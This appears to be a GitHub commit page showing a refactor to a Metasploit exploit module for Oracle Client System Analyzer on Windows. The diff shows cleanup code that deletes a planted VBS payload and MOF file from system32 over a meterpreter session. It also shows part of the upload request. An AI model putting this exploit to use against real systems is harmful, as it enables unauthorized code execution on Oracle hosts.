Skip to content

Commit 9054faf

Browse files
committed
Not sure why paths were repeated, but no more.
1 parent 4675cd8 commit 9054faf

File tree

1 file changed

+10
-6
lines changed

1 file changed

+10
-6
lines changed

modules/exploits/windows/oracle/client_system_analyzer_upload.rb

Lines changed: 10 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -63,25 +63,29 @@ def on_new_session(client)
6363
return if not @var_mof_name
6464
return if not @var_vbs_name
6565

66+
vbs_path = "C:\\windows\\system32\\#{@var_vbs_name}.vbs"
67+
mof_path = "C:\\windows\\system32\\wbem\\mof\\good\\#{@var_mof_name}.mof"
68+
6669
if client.type != "meterpreter"
6770
print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
68-
print_error("The vbs payload (C:\\windows\\system32\\#{@var_vbs_name}.vbs) and mof file (C:\\windows\\system32\\wbem\\mof\\good\\#{@var_mof_name}.mof) must be removed manually.")
71+
print_error("The vbs payload (#{vbs_path}) and mof file (#{mof_path}) must be removed manually.")
6972
return
7073
end
7174

7275
# stdapi must be loaded before we can use fs.file
7376
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
7477

75-
cmd = "C:\\windows\\system32\\attrib.exe -r " +
76-
"C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof"
78+
attrib_path = "C:\\windows\\system32\\attrib.exe -r "
79+
80+
cmd = attrib_path + mof_path
7781

7882
client.sys.process.execute(cmd, nil, {'Hidden' => true })
7983

8084
begin
8185
print_warning("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...")
82-
client.fs.file.rm("C:\\windows\\system32\\" + @var_vbs_name + ".vbs")
86+
client.fs.file.rm(vbs_path)
8387
print_warning("Deleting the mof file \"#{@var_mof_name}.mof\" ...")
84-
client.fs.file.rm("C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof")
88+
client.fs.file.rm(mof_path)
8589
rescue ::Exception => e
8690
print_error("Exception: #{e.inspect}")
8791
end
@@ -95,7 +99,7 @@ def upload_file(data)
9599
'version' => '1.1',
96100
'method' => 'POST',
97101
'ctype' => "application/x-www-form-urlencoded",
98-
'data' => data,
102+
'data' => data
99103
})
100104

101105
return res

0 commit comments

Comments
 (0)